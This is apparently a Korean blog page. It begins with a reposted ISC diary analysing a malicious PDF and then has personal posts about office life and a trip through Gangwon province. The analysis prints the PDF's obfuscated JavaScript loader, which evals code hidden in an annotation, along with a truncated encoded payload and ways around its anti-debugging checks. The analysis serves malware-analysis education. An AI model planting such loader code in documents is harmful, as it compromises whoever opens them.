3 comment(s)

This sample came to us from ISC reader Joe, who reported that his Acrobat reader had crashed with the error message "A 3D parsing error has occurred". The obfuscation approach used by this sample isn't brand new, this type has been around since about mid December as far as we know. No matter, this ISC diary is not about breaking news, more about analysis technique.

$ md5sum bad.pdf
0045c97c4e9e44cac68bd85e197bfae2 bad.pdf
$ ls -al bad.pdf
-rw-r----- 1 daniel handlers 37275 2010-01-06 04:04 bad.pdf

This sample currently still stumps automated analysis tools like the usually excellent Wepawet, but this PDF is indeed malicious. Lets take a look, using Didier Stevens' pdf-parser.py as before.

$pdf-parser.py -a bad.pdf
Comment: 3
XREF: 1
Trailer: 1
StartXref: 1
Indirect object: 10
3: 7, 8, 10
/Action 1: 6
/Annot 2: 5, 9
/Catalog 1: 1
/Outlines 1: 2
/Page 1: 4
/Pages 1: 3

This document defines an "action" which triggers when the document is opened. The corresponding code is in Section 6 of this PDF. Looking at this section, we see that this is indeed a JavaScript block, but the actual code resides in section 7

$ pdf-parser.py -o 6 -f bad.pdf
obj 6 0
Type: /Action
Referencing: 7 0 R
[(2, '<<'), (2, '/Type'), (2, '/Action'), (2, '/S'), (2, '/JavaScript'), [...]

<<
/Type /Action
/S /JavaScript
/JS 7 0 R
>>

Continuing the quest, let's look at section 7:

$ pdf-parser.py -o 7 -f bad.pdf
obj 7 0
Type:
Referencing:
Contains stream
[(2, '<<'), (2, '/Length'), (1, ' '), (3, '231'), (2, '/Filter'), (2, '/FlateDecode'), (2, '>>'), (1, 'rn')]

<<
/Length 231
/Filter /FlateDecode
>>

"var z; var y; n var h = 'edvoazcl'; nt z = y = app[h.replace(/[aviezjl]/g, '')]; nt var tmp = 'syncAEEotScan'; y = 0; t z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( { nPage: 0 }) ; var s = p[0]; s = s['sub' + 'ject']; var l = s.replace(/[zhyg]/g, '%') ; s = unescape ( l )
;app[h.replace(/[czomdqs]/g, '')]( s);n s = ''; z = 1;"

That's more like it! Here we actually get JavaScript code ... and this code is probably the reason why some of the automated analyzers fail: This isn't simple JavaScript, it makes use of Adobe Acrobat specific JavaScript objects and methods to refer to the currently loaded document (app.doc), to identify any "annotations" within this document (syncAnnotScan), to access the first annotation (getAnnots), to assign it to a variable, and finally to eval (run) the code within this variable.  

When we ran pdf-parser.py -a above, it showed "/Annot 2: 5, 9", indicating two annotation sections, 5 and 9. This script accesses the first annotation, thus section 5. Looking into section 5, we see that it simply refers to section 8 .. and there, finally, we find the code block

$pdf-parser.py -o 8 -f bad.pdf

obj 8 0
Type:
Referencing:
Contains stream
[(2, '<<'), (2, '/Length'), (1, ' '), (3, '8583'), (2, '/Filter'), (2, '/FlateDecode'), (2, '>>'), (1, 'rn')]

<<
/Length 8583
/Filter /FlateDecode
>>

'y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y64y64y6cy50y54y63y71y63y30y5fy43y67y28y76
y34y32y73y5fy36y34y2cy20y56y5fy5fy4ay53y33y32y29y7by76y61y72y20y71y41y69y5fy45y44y20y3
dy20y61y72y67y75y6dy65y6ey74y73y2ey63y61y6cy6cy65y65y3by76y61y72y20y54y38y5fy32y72y5
[...etc...]

Two more stages of decoding await the analyst here. First, we have to untangle the above (substitute y with %, then unescape). The resulting JavaScript code is still obfuscated:

function ddlPTcqc0_Cg(v42s_64, V__JS32){var qAi_ED = arguments.callee;var T8_2r_twoNOkI = 0;var
Fyaf2_8v_c7i = 512;qAi_ED = qAi_ED.toString();try {if (app){T8_2r_twoNOkI = 3;T8_2r_twoNOkI--;}}
catch(e) { }var ad_____M = new Array();if (v42s_64) { ad_____M = v42s_64;} else {var jVhSGHs = 0;
[...etc...]

Note how it makes use of "arguments.callee", an anti-debugging technique that we covered before. Also note how the code is again dependent on the presence of the "app" object... which is Adobe specific, and won't exist in Spidermonkey. But all you have to do to get past this stage in SpiderMonkey is to first define the app variable (set it to anything you like, app=1 works fine), and then to use your normal trick to get past the "arguments.callee" trap. I still like to use the copy of SpiderMonkey that I patched to print on every eval call.
 

Phew! Yes indeed. Considering the complexity of all this, it is probably no surprise that we are seeing such an increase of malware wrapped into PDFs ... and also no surprise that Anti-Virus tools are doing such a shoddy job at detecting these PDFs as malicious: It is darn hard. For now, AV tools tend to focus more on the outcome and try to catch the EXEs written to disk once the PDF exploit was successful. But given that more and more users no longer reboot their PC, and just basically put it into sleep mode between uses, the bad guys do not really need to strive for a persistent (on-disk) infection anymore. In-memory infection is perfectly "good enough" -  the average user certainly won't reboot his PC between leisure surfing and online banking sessions. Anti-Virus tools that miss the exploit but are hopeful to catch the EXE written to disk won't do much good anymore in the near future.
 

 

http://www.mysectools.com/MySecTools/The_Tools/Entries/2010/3/30_Malware_Analysis_Tools.html

어디에서 보고 퍼온 링크인지는 잘 기억이 나지 않는데..
firefox 탭 정리하면서 기록해 놓습니다....

해당 링크에는 IT 중 분석에 필요한 툴들을 모아놓은 사이트 입니다.

이건 집에 가서 ^^;;
일단.. 앞서 강원도 이야기를 너무 길게.. 오래 써서 그런지..
지쳤다 ㅠㅠ
비록 강원도 여행보다
더 긴.. 더 많은.. 시간과 사람들을 만났지만..
여기는 사진이 많음으로..ㅋㅋ
사진으로 대체하고 훅훅.. 넘어가도록 하겠다.
그럼 이제 퇴근-*

회사 내 책상이다 ㅇ_ㅇ;;

사진상으로는 좀 좁아보이긴하지만...

내가 생활하는데 불편하거나 그러진 않다.

이보다 좀 더 넓으면.. 무언가 휑~ 한 느낌이 될꺼같다랄까??


일단 내 책상!! 좌측에는 책꽂이와 책들.. 수첩.. 그리고 그 옆에는 가려서 안보이지만 명함과 컵.. 작은 피티가 하나 있다..
그리고 그 벽에는 hping 옵션과 PE 구조가 붙어있고 그 옆에는 드디어 나의 노트북과 키보드.. 마우스..가 보이며 +_ +
모니터와 노트북 사이에 자그마한 선풍기가 보인다 +_+;;
나의 여름을 지켜줄 선풍기..  +_ +;;;;;;;

그 옆에는 또 자그마한 노트북이 있는데..
이놈은 펜티엄 500짜리다.. 맞나..?;;; =_=;;
램도 기억상으로는.. 64였던거 같은데 -_-ㅋ;;;;;;;;;;;;;;;;;;;


책꽂이의 모습이다.. 리버싱책과 리눅스.. 아이폰.. 프로그램 관련된 책과
IPS.. CCNP 책이 꼽혀 있으며..
그 외에는 서류철 및 문서들이 꼽혀 있다..
앗.. 동전도 보이는구나;;

그 오른쪽에는 말했듯이 명함과 컵.. 그리고 회의할때..나 담배피러 갈때 들고가는 PT ㅇ_ㅇ;;

그리고 책들 앞에는 또 책이 2권..
온라인게임 해킹
정보통신 용어해설
이라는 책이 각각 있으며, 그 위에는 회사 수첩이 있다 +_ +;

드디어 마지막 날이다 ^^
전날 늦게 잔 탓일까??
일어나보니 이미 10시 30분이였다..

꾸무정대면서.. 영현이형이 끊인(?) 햄찌게(절대 부대찌게 아님)를 먹고 나서
또 여유를 부리며 담배 한대를 폈다 =_=;;

형.. 미안.. 난 절대 내가 음식을 만들거나 설거지하기 싫어서 느긋했던게 아냐;;
다음에 혹시 같이 가게되면 내가 할께 ㅠㅠ

미안함을 뒤로하고.. 상큼하게 샤워를 하고 나오니..
벌써
출동 준비 완료!!

그렇게 또 차를 타고 강원도 탐험이 시작되었다.
일단 시작은 속초 시내!!

A양이 멀미를 한다면서 약국에 가길래 따라가서 냉큼 비타민 하나 사가지고 오고..
(그렇게라도 해야지 형에게 덜 미안할 듯 해서?? ㅋㅋ)
(이 글을 읽는 형의 예상 반응..)
("왜 이렇게 착한 척이야??~~" ㅋㅋㅋㅋㅋㅋㅋㅋ)
던킨에 가서 쿨라타 한잔씩하시고-
춘천으로 고고싱-

춘천으로 가는 길에 도착한 미시령-
사실.. 미시령.. 예전에 한번 정도는 온거 같긴 한데.. 기억이 안난다;;
휴게소는 마치 옛유적이나 된듯.. 옛향수를 불러일으키는 것들이 많아서
설레였고..
휴게소안에 먹거리 파는 가게들은 다 닫혀져있어서.. 한편으로는 마음이 아팠다.
그리고 휴게소에 내 흔적을 남기고 왔다.. 흐흐.. (+__)ㅋ

<http://blog.daum.net/stella708/12091376>

참!!
미시령을 올라가면서 느낀거지만.. 날씨가 좋아서 그런지 자전거로 다니시는 분들이 참 많았다. 젊은 사람부터 나이 지긋하신 어르신들까지..
정말 "멋지다!!" 라는 말밖에 안나오는 분들이셨다 +_ +

그렇게 좋은 경치 구경하면서 다시 또 드라이브아닌 드라이브(?)가 시작되었다..

한참 가다가 어디가는지 궁금해서 물어보니 소양강댐에 가면 앞에 공원이 있는데 거길
가자고 하는 우리의 운전 기사!!

그렇게 정말 끝도 없이 차를 타고 갔다..
근데 여기서 잠깐!!
한가지 짚고 넘어가자..
여기서 언급 안하면 이건 추억이 아니라.. 그냥 잊혀질테니.. ㅋㅋ;;
1일차때.. 밤에 가서 뒷자리가 안보여서 몰랐는데..
3일차에는 해 떠 있고.. 또 내가 뒷자리에 타다보니.. 한가지 느낀 사실!!
A양이 정말 잘잔다 -_-ㅋ
일단 차에 타면 5분 내로 무조건 잔다..
잘잔다.. 일단 여기까지!! 중간 중간 언급하겠다..
이때도 우리 A양께서는 잘 자고 있었다.. 꾸뻑꾸뻑..

그렇게 한없이 차를 타고 가다가 휴게소에 다시 도착!!
핫바 하나씩 물고 슬금슬금 다시 고고싱-

핫바를 하나 먹고.. 또 차에 타자마자 급하게 잠드는 A양..
결국 속초에서 춘천까지 한 3시간(?)정도 걸렸는데..
그 3시간을 내리잤다.. 여기서 한번 카운트 세어보는 것도 좋을 듯.. 일단 3시간!!

그렇게 춘천 소양강댐에 슬금슬금 올라가니..
저~~~~~~~~~멀리 보이는 모터보트 =_=;;
영현이형이 먼저..
"우리 모터보트나 탈까?"
Olleh~
다른 사람들 반응을 보니 재밌을 듯...? ㅎㅎ
'이런 악마같은 속마음 하곤.. (+__)ㅋㅋ'
이라고 생각하며 바로 고고싱-


으히..
신모누님께서.. 자꾸.. 자리에 안앉으시고.. 자꾸 누우려고 하시던.. ㅋㅋ
모습이.. 생생하네요.. 으하하~!!!!
앞에 있던 A양의 표정은.. 못봐서 잘 모르겠~습~니다~
ㅋㅋ;;
하지만., 타고 나오자마자.. 영현이형이 바로.. 표정을 재현!!
음............
A양의 표정.. 순간.. 상상되버렸.....................................ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
그렇게 유쾌한 여행을 계속 하며.. 앞서 영현이형이 지인에게 물어봐서 알아놓은 닭갈비 집으로 갔다!!

춘천하면 바로 닭갈비!!
그 중에서 단연 으뜸이라면 통나무집이라고 한다..
가보니 진짜 통나무집만 사람들이 줄을 서서 기다리고 있었다.

<http://www.chdakgalbi.com/new>
(여기는 택배도 된단다 =_=)

이때 시각.. 아마도.. 한.. 5시 20분??
도착했는데.. 1시간을 기다려야된단다 ㅠㅠ
(우리 번호는 95번..)
회사 동료이자.. 동기이자.. 춘천이 수도권이라 생각하는 우리의 봉철군에게 전화를 해서..
"봉달아 춘천에 닭갈비 맛있는데가 어디야?"
"여기 1시간 기다리래;; 기다려서 먹어볼만한 곳이야?"
라고 물어보니..
"기다려"
라는 단백한 말에 바로 기다리기 Mode 발동!!
(이 당시 번호가 61번)
그렇게 대기실에서 우결을 다 보고나니.. 엄허.. 곧 우리 차례!!
우왕 굳.. 그렇게 우리는 1시간을 기다려 드디어 통나무집에 입성할 수 있었다.

그렇게 들어간 통나무집은.. 그냥 보기만 했을때는 다른 집과 별다를게 없어보였다..
But..
한입 베어물은 닭갈비의 맛은..
서울에서는 절대로 맛 볼 수 없는 맛이였고!!
1개만 시킨 막국수는.. 우리 모두가 즐기며 먹을 수 있는 양이였다!!!!!
먹다가 야체들이 좀 남았을 무렵.. 우리는 모두 지지..를 쳤고..
그래도 밥도 비벼서 먹어봐야되지 않겠느냐.. 라는데 의견이 모아져서
밥도 하나!! 추가!!
그렇게 먹은 밥 또한.. 뭐랄까.. 색다른 맛이랄까?
닭갈비를 먹으러 가서 한번에 3가지 맛을 즐길 수 있었던 아주 좋은 시간이였다.
+_ +
(나와 권모씨 빼고는.. 그렇게 맛있다는 반응이 아니였다 ㅠㅠ)
그렇게 배터지게 먹고 나니..
집에.. 어머니가 오징어를 사오라고 했었는데.. 무겁다고 안들고 간다고..
사지 않고 그냥 집으로 돌아오던.. 내 자신을 발견하고..
닭갈비 2인분을 포장해서 샀다 =_=;;
근데.. 나처럼 포장을 원하는 사람이 많은지..
카운터 옆에는 2인분, 3인분으로 나뉘어져 수 많은 아이스박스에 포장이 되어있었다.

그렇게 2인분을 하나 사서 다시 또 집으로 고고싱-
정말 우리가 Nice하게 날짜르르 잡은게..
놀때는 정말 햇볕 쨍쨍!!
닭갈비 먹고 딱!! 나오니까 비가 시작되었다 =_=;;
정말정말 나이스 타이밍에 기분이 업업 되고 있었다.

하지만.. 우리가 예상치 못한 복병이 있었다..
우리는 바쁘지 않지만..
우리가 렌트한 차가 바쁜 것이다 =_=;;
10시까지 반납인데.. 고속도로 진입시 시간이 이미 7시..
근데 설상가상.. 서울춘천간 고속도로도 이미 막히고 있었다 =_=;;
그렇게 마음졸이다가 전화해보니.. 다음날 오전에 가져오라고 하고..
추가 요금만 더 받겠단다..
음.. 한결 마음이 가벼워지는 반가운 소리 +_ +;;

우리가 이런 고민을 하고 있을 때.. A양은 또 자고 있었다 -_-ㅋ
자.. A양이 지금까지 잔 시간을.. 그냥 앞에서 언급한 3시간..에서부터 더 추가하자

그렇게 막히는 고속도로를 지나 천호에 와서.. 나를 내려주는데..
이미 시간은 10시 30분정도가 되어있었다..
즉.. A양은 이미 6시간 이상을 숙!면!

중간에 A양이 살짝 살짝 깼지만.. 나중에 물어본 결과..
"내가 깼었어?"
란다 =_=;; 무서운 A양..

사실.. 모란까지 대려다 달라고 하고 싶었지만..
권모씨가 운전을 3일 내내 했기 때문에
차마 가자는 말은 못하고 조용히 퇴장 =_=;;

천호역에 내린 나는 8호선 종착역인 모란까지 지하철로 슝슝슝-

그렇게 도착한 우리집 가는 길에 하늘에서 뿌려지는 빗줄기와
빗물에 맞아 떨어진 수 없이 많은 꽃잎들을 밟으며 지나가는데...
1주일 만에 보는거라 그런지 어찌나 그 길이 이쁘던지..
내 눈에만 담기가 아쉬울 정도랄까..?
하지만 아이폰으로 심야촬영은 불가 ㅠㅠ
그리고 내 눈에 맺힌 그 느낌을 화면으로 표현하기는 힘들꺼 같아서 잠시
발길을 멈춰 내 눈에 넣어두었다.

그리고 도착한 집..
1주일만에 아들 왔다고 반겨주시는 어머니를 뒤로하고..
바로 Die..

재밌었던 여행이였고..
행복했던 여행이였고..
좋은 사람들과 함께 할 수 있어서 더욱 행복한 여행이였다..
See you..
God bless you..


ps. A양의 잠잔 시간..
아침에 잠잔 시간                                    - 약 5시간??
내가 차에서 내리기 전까지 차에서 잔 시간  - 약 6시간
내가 차에서 내린 후 차에서 잔 시간           - 약 1시간
================================================================
토탈                                                     - 약 12시간

내가 차에서 내릴때도.. A양이 나에게 인사는 했지만..
그것도 잠결에 했다는 이야기가 있다 =_=;;
이렇게 자고도 집에가서 또 잤겠지!!
아무튼.. 이 글의 결론은 12시간~

<2010년 05월 25일 판교 테크노벨리(벤처벨리) 2층에서 올려다 본 하늘>

날씨가 너무 좋아서 아이폰으로 한컷-
왼쪽 건물이 우리회사가 있는 건물.. 오른쪽 건물은 마이다스아이티라는 회사 건물..
어쩜 하늘이 저렇게 이쁠 수가 있을까요??

오늘은 주니퍼 방화벽 교육을 받고 있습니다.

오늘 해야 할 일
1. Snort 패턴 2개 뽑기
2. Virus 1개 정밀 분석하기(되도록 오늘 내로)
3. 보고서 작성하기(1~3일 예상)
4. 보안뉴스 작성하기

그러나.. 아직 교육도 안끝난다는 거죠.. 2시간 정도 더 할꺼 같다던데..
오늘은 야근을 해야겠어요 ㅇ_ㅇ;;
이제 다시 슬슬 예전 생활로 적응을 해야되니까요

^_____________________________________________^

http://www.chdakgalbi.com/new

길어서 총 3개의 글로 나눠 쓸 것이다.. 지금은 2일차!!

2일차.. 아침 8시 30분쯤? 눈을 뜬 것 같다..
눈을 떴는데..
"음..? 여긴 어디..?"
잠시 잊고 있었다.. 여행을 왔다는 것을..

그렇게 일어나서 씻으러 가기전에.. 갑자기 형이 나보고 옥상을 가자고 하면서 여기 올라가자고 한다.. 그러면서
"먼저 올라가 있어. 난 신여사 보고 갈께"
라고 하길래 한치의 의심도 없이
"어 알았어 빨리 와"
라고 하고 올라가는데..
조금 올라가니 형이 붙잡는다..
나중에 알고보니.. 여탕으로 올라가는 계단이였던 것이다.. 순간 변태 될뻔.. ㅠㅠ


<http://cafe.naver.com/damoara/164>

그렇게 올라가서(응?) 옥상에 도착!!
속초의 전경을 한번 쭈욱~~ 훑어보면서
"아~ 좋쿠나~"
를 연발하면서 샤워 후.. 드디어 아침을 먹으로 고고싱 +_ +;;

누나가 맛있는 밥집이 있다고 해서 갔는데..
음.. 누나 미안해요.. 별로 였어요 (+__)ㅋ

그렇게.. 좀 늦은 아침을 먹고 1박2일에도 나왔던 아바이마을에 잠시 들렸다.
아바이마을에는 사람이 어마어마하게 많았다..
그 중에서도 진짜 사람들이 징글징글하게 많은 곳.. 2곳이 있었으니..
바로..
1. 갯배타는 곳..
2. 1박 2일에 나왔던 물고기구이집..

갯배는 성인 200원인데.. 줄을 거의 100m는 서 있었고..
방송에 나왔던 그 집은.. 대략 40명 넘는 인파가 그 앞에서 줄을 서서 기다리고 있었다..
후아.. 너무 복잡해서 패스패스패스..
오징어순대나 먹어볼까? 했는데 가격도 만원!! ㅠㅠ 가난한 서민은 물러가옵니다..
다음에 뵈어요 오징어순대사마~

그렇게 아바이마을을 구경한 이후..
잠시 배들이 정박되어있는 곳에 가서 한바퀴 구경~

오징어배를 그렇게 가까이서 본적이 처음인듯.. 배도 오래된 배부터 새로 건조된지 얼마 안되어 보이는 배까지.. 다양하게 구경할 수 있었다 ^^

그렇게 구경이 끝나고 이마트로 장보러~
(여기서 낚시가 시작되었다..)
사실.. 나를 제외한 나머지 사람들은 다들 바닷가에 놀러온 사람 복장이였다..
나만 청바지에 운동화를 신고 있고.. 다들 반바지에 쪼리를 신고 있었기 때문이다..
이제 낚시는 시작되어.. 영업하는 권모씨에게 낚여 결국 쪼리와 반바지를 구입하게 되었다..
일단 여기서 거의 6만..
고기와 술.. 그리고 과자.. 음료수.. 행복한 마음을 가득 담아.. 바로 펜션으로 고고싱~

그렇게 도착한 펜션은.. 생각보다 바다에서 초큼.. 많이 먼 곳에 위치해 있었다..
하지만.. 뭐.. 방은 예상했던 것 보다 괜찮은 편이였다 ^^

짐을 방에다 풀어놓은 이후..
대포항을 가자고 하면서 일단 고고싱-

그렇게 시작된 드라이브는.. 대포항에 도착할 때쯤.. 너무나도 차가 많아서.. 일단 지나치고
낙산사쪽으로 향하게 되었다.. 그렇게 드라이브를 하는데..
영현이형이 어찌나 그리 잘 골라가던지.. 차도 없고.. 사람도 없고..
한적하지만 경치좋은 샛길로 가는데..
이야.. 이게 여행이다.. 싶다랄까? 아니.. 이게 휴향이구나.. 라는 느낌? ㅎㅎ

그렇게 헤매다가 처음 우리가 발을 멈춘 곳은 오산리선사유적박물관....
이곳을 간 이유는.. 단 한가지다..
그냥 드라이브 하던 도중.. 보여서 갔을 뿐이였다.. So Cool
그런데 또 이런게 의외로 괜찮았다고 할까? ㅎㅎ


<http://www.osm.go.kr>
(아.. 괜찮은 사진이 있었는데 지워졌음.. ㅠㅠ 왜 지워진거지..ㅠㅠ 박물관 홈피 사진으로
 대체..했습니다..)





참고로 필자는 아니다 =_=;;

박물관 앞으로 펼쳐진 갈대(?)와 옆으로 펼쳐진 잣나무(?)들이 어울리니..
가히 절세미녀와 같은 모습이였다고 할까? 그정도로 박물관이 아름답게 펼쳐져 있었다..

A양이 여기서.. 움막 안에 불을 피우는 위치가 달라진다고 하면서 그게 뭐냐는 질문을 던졌다..
"음..? 난 그런 말 처음 듣는데..?"
그렇다.. A양만 빼고는 다 처음 듣는 이야기였던 것이다..
지금도 웹서핑을 해봤는데.. 그에 관련된 내용은 안나온다.. 혹시 이와 관련하여 아시는 분은 댓글 좀 남겨주세요..

그렇게 구경을 하고 나온 이후 바로 또 드라이브..
여기서부터는 Best Driver인 누나가 운전을 시작했다.
양양국제공항을 약 1/3바퀴 정도 도는데..
또 여기 경치가 어찌나 절경이던지..
감탄사가 절로 나온다.
또한 그 곳을 빠져나와 양양국제공학 주위를 보는 것 또한 절경이다.

그렇게 자연을 만끽한채.. 우리가 결국 도착한 곳은 하조대!!
하조대에 도착하자마자 바로 발을 담그고 싶었지만.. 배가 너무 고파서.. 회한접시~ +_+;
하지만.. 필자는 회를 그리 많이 먹지 못한다 =_=;;
하조대 옆에 큼지막하게 있던 횟집에서.. 뭐 꽁짜다 뭐다 하면서 주더니.. 결국 돈을 좀 더 받아서.. 초큼 마음이 편치 않았지만.. 여행왔으니까 쿨하게 잊어버리고 이번엔 하조대로 올라갔다. +_+;;

하조대에서 내려다 본 풍경 또한 너무나 좋았다.


하조대에 올라가니 마치 포토존이나 되는 듯한 곳에서 사람들이 줄을 서서 사진을 계속 찍고 있었다.. =_=;;

멋진 경치를 구경하고 이젠 해수욕장으로 와서 발담그고 놀기~
물이 어찌나 시원하던지.. 발이 다 얼얼할 지경이였다..
가위바위보해서.. 지는 사람은 파도 3~5번 올때동안 바다에 발담그고 있기..를 했는데..
가위바위보에 약한 나는.. 3번 중 2번이나 걸렸다 ㅠㅠ
그렇게 놀다가 영현이형과 오기가 발동!!
누가 더 발담그고 오래 버티나에 돌입했다..
내기는.. 아이스크림내기!!!
처음엔.. 죽을거 같이 추웠는데.. 이게 또 적응되니 조금 괜찮아졌다..
하지만.. 좀 더 깊게.. 무릎을 지나자..
"욱..."
무릎이 시리기 시작했다.. ㅠㅠ
조금 밖으로 나와서 어슬렁 거리면서..
"아.. 나가야되나.. ㅠㅠ"
하는 찰라.. 누나가 그냥 아이스크림 산다고 나오란다.. 잽싸게 나가야지..
야호!! +_ +;

그렇게 나와서 발 씻고 아이스크림 하나 빨면서 또 다시 드라이브-
(설레임 로즈를 먹었는데.. 이건.. 맛이 특이했다.. 추천하고 싶지 않다. =_=)

그렇게 이제 돌아오는 길이 시작되었다..
중간에 낙산사 근처에 갔는데.. 부처님오신날이라 그런지.. 낙산사에는 갈 엄두조차
안날 만큼.. 사람들과 차들이 많았다.. 그냥 거기는 일단 포기하고..
하지만.. 내일을 장담할 수 없기에..
우리는 마지막으로 대포항으로 향했다..

대포항은 일단 차가 막혔다 ㅠㅠ
그래도 도착한 대포항.. 항이란 단어가 무색할 정도로 일단 기름냄새가 진동을 하였다..
조금 가다보니 이유를 알 수 있었다.. 입구에 무지막지할 정도로 튀김집이 많았던 것이다 ^^;;
그 중에서도 특히 사람 많은 집이 있었는데..


<http://blog.naver.com/jounharu1/140106683545>

이집이였다.. 하지만.. 그렇게까지 줄을 서서 그거 하나를 먹고 싶진 않았기 때문에 Cool 하게 다른 집에서 샀다 =ㅁ=;;
구경을 조금 더 하다가 새우튀김과 오징어순대를 사고..
드디어 정암해수욕장 근처에 있는 펜션으로 고고싱-

그렇게 도착한 펜션..
일단 씻고 나서..
개취(개인의취향)를 다운 받아보면서 느긋하게 준비를 하고..
드디어 꼬기를 먹으러 나가는 순간..
아..? 뭔가 이상한 분위기;;
그릴(?)을 예약을 했는데.. 다른팀인줄 알고 그냥 줘버린 것이다..
그렇게 해서 우리는 그릴이 없는 상황이 되었고..
일단 영현이형이 화가 났다..
가만히 지켜보고 있자니.. 그냥 버너랑 돈 만원 주면서 무마하려고 한다..
그 순간.. 내 심기를 건드리는 모습이 발견 -_-ㅋ;
우리가 예약한 그릴을 자기들것인양.. 가져간 팀에서.. 우리가 하는 이야기를 들은건지.. 타이밍이 좋은건지.. 딱 만원을 가지고 온 것이다..
이때 내 생각에는.. 이 아저씨가 만원을 다시 돌려주고 그릴을 가져와야된다고 생각이다.
내 생각엔 이게 정상인데.. 이 아저씨는 그 만원을 받고서
우리가 내는 짜증을 다 받더니.. 다른곳에서 숯불을 가지고 온단다..
이런 상황은.. 그냥 뭐.. 그럴수도 있지.. 하고 넘어가는데..
아저씨의 행동을 보니.. 너무 짜증이나서 일단 담배를 피고 있는데 영현이형이 화내지 말라고 그냥 들어가자고 한다 -_-ㅋ;;
이럴때보면 나보다 성격이 좋단 말이지.. 나같았으면 바로 삿대질에 도전적인 말투로 뭐라 했을텐데.... =_=;;

아무튼.. 그렇게 다시 방으로 들어와.. 잠시 씩씩..대다가.. 또 Cool 하게 분위기 좋아지고..
그렇게 10시 좀 넘어서(?) 고기와 술..이 익는 밤이 시작되었다.. +_ +;;
일단 오십세주로 시작한 우리는.. 결국 술이 모자르자..
영현이형이 옆쪽에서 술을 마시던 아저씨&아주머니 쪽으로 가서.. 노래를 부르고 소주 2명을 얻어오는데 성공했다.. 그러나.. 이 사건은 여기서 시작이였다..
이후.. 아저씨&아주머니들의 러브콜에.. 한번 더 불려갔던 형은.. 결국..
등심과 장어를 가지고 돌아오는 엄청난 쾌거를 이루어내었다..
Bravo-

But.. 거의 끝나가는 판이였기에.. 장어는 많이 못먹었다 ㅠㅠ
그렇게 마시다가..
즐거운 폭죽 타임!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
정말 즐겁게 폭죽 터트리면서 놀았던거 같다 +_+
(다만 아쉬운건 사진이 없다는 거 ㅠㅠ)

그렇게 폭죽을 터트리고.. 해수욕장 모래에 누워
바닷소리를 들으며.. 밤바다를 올려다 보며.. 하루를 되뇌어봤다..

그렇게 다시 펜션으로 들어와.. 시작된.. 도박의 현장..
쩜 100을 치자는 S양의 발언에.. 놀랐지만.. 다들 인정하는 분위기..
(여기 하우스인가요.. ㅠㅠ)

그렇게.. 타짜에게 낚여.. 5천원을 잃고..
몇판 치다보니..
"헐퀴.. 해 떴다!!"
그렇습니다.. 하우스에서 고스톱치다가 해가 떠버린 것입니다..
아.. 낚였습니다.. 이 사람들이 나만 노리고 치나봅니다.. ㅠㅠ



해 뜨는 시각.. 거의 5시.. 그때도 딱 이랬다.
해뜨기 한.. 4분 전??

그렇게 해가 뜬 사실을 인지하자마자.. 바로 취짐 분위기..
잠시.. 노래 한곡 틀고.. 밖에 나와서 담배 한대 피고 나왔는데..
이 사람들이 벌써 자고 있는 시츄레이션.. 일출 좀 보고 자지..

뭐.. 어쩔 수 있나.. 나도 둘쨋날이 좀 아쉽지만.. 잘 수 밖에..
굳나잇(?).. 둘째야..

5/20 ~ 5/22일까지 총 2박 3일간 여행을 다녀왔다.
그 전에 5/17~5/20일까지 인천 을왕리해수욕장에서 신입사원역량강화 교육을 받았는데..
그걸 끝나고 연휴를 이용해 바로 강원도로 떠나는 일정이였다..

성남 모란에 사는 나에게.. 8시까지 천호역으로 나오라더니..
이건 뭐.. 9시 20~30분쯤 도착 ㅠㅠ
1시간 넘게 기다리는 지루한 시작이였다 =_=;;

그렇게 기다려서 드디어 차에 타고 출발!!!
이렇게 얼굴을 보지 못한 채... 일단 차에 타고 뒤에서 들리는 목소리를 감상하며 출발했다;;



총거리 180km 정도에 시간만 3시간이 넘게 걸리는 엄청나게 먼~~ 곳 =_=;;
주유비만 해도 5만원이 되는 엄청나게 먼 곳이다 =_=;;
그렇게 조금 가다가.. 일단 휴게소에 들러서 드디어 얼굴을 볼 수 있었다..

.... 그 다음 생략... ㅎㅎㅎ(농담)

그렇게 휴게소에 들려서 오징어와 호두과자를 사들고 다시 출발~~ +_+;;
뒤에 앉아있던 은영이와 순희누나가 먹으라고 오징어 찢어서 주기도 하고..
(이하 누나는 그냥 누나.. 은영이는 은영이로)
그렇게 쭈욱.. 가는데 결국 뒤쪽 자리는 모두 꿈나라로 1차 여행을 떠나버리더군요..

영현이형이랑 둘이서 이야기를 좀 하면서 가는데 네이게이션이 호러모드.. =_=;;
고속카메라가 붙어있을 때.. 제한속도를 넘기면 얘가 검은색과 하얀색을 반전시키면서..
완전 공포분위기를 조성..하더군요..
조금 더 가다보니.. 네비게이션이 계속 경로를 재탐색하면서 없는 길을 가면서 산으로 가기 시작했다. =_=;;
초큼 놀라서 왜 이러지?~ 이랬는데.. 알고보니 도로 공사중이라.. 다른 길로 우회해서 가는 거더군요.. =_=;;

그렇게 우여곡절 끝에.. 12시 20분쯔음 도착!!!
일단 속초해수욕장 쪼로록.. 가서 밤바다 한번 훑어주시고~


<http://blog.daum.net/kilimanjalo/12802899>
<카메라를 가져갔어야되는데.. 못가져가서 사진을 종종 퍼올 겁니다 ^^;;>

바다에 도착하니 어찌나 시원~하던지..
여기저기 이미 폭죽 터트리는 사람들도 많고.. 돗자리 깔아놓고 맥주 한잔 하는 커플도 많고..
+_ +;;

그렇게 잠시 멍.. 때리고 보다가
방파제로 다가가봤더니.. 음..? 하트 열매가 열린 나무가..?;
볼거리를 참 잘해놨단 생각이 들었다 +_+ ;;


<http://2proo.net/1227>
(밤에 갔는데.. 사진을 못찍은 관계로.. 또 다시 펌..)

하트나무 옆에는 소라모양과 물고기모양의 돌이 있었다.
간단하게 구경을 하고 뒤쪽에 야구장이 있길래 다가갔는데..

헐..

보면 농구공 많이 넣는 게임이 있는데.. 그 안에 남자얘가 들어가서 계속 공을 집어넣고 있는게 아닌가!! ㅋㅋ;;
아.. 대박.. 이런 모습을 또 어디가서 볼까? ㅎㅎ
551개라는 대기록을 세우고 그 안에서 유유히 빠져나오는 모습.. ㅋㅋ
도착한지 딱 10분정도 만에.. 이번 여행은 무언가 재미있을 것 같다는 느낌이 마구마구 들기 시작했다.. +_ +;

그렇게 해수욕장을 구경하고 빠져나와 바로 찜질방으로 갔다.
찜질방은 서울보다도 오히려 시설이 좋았다.
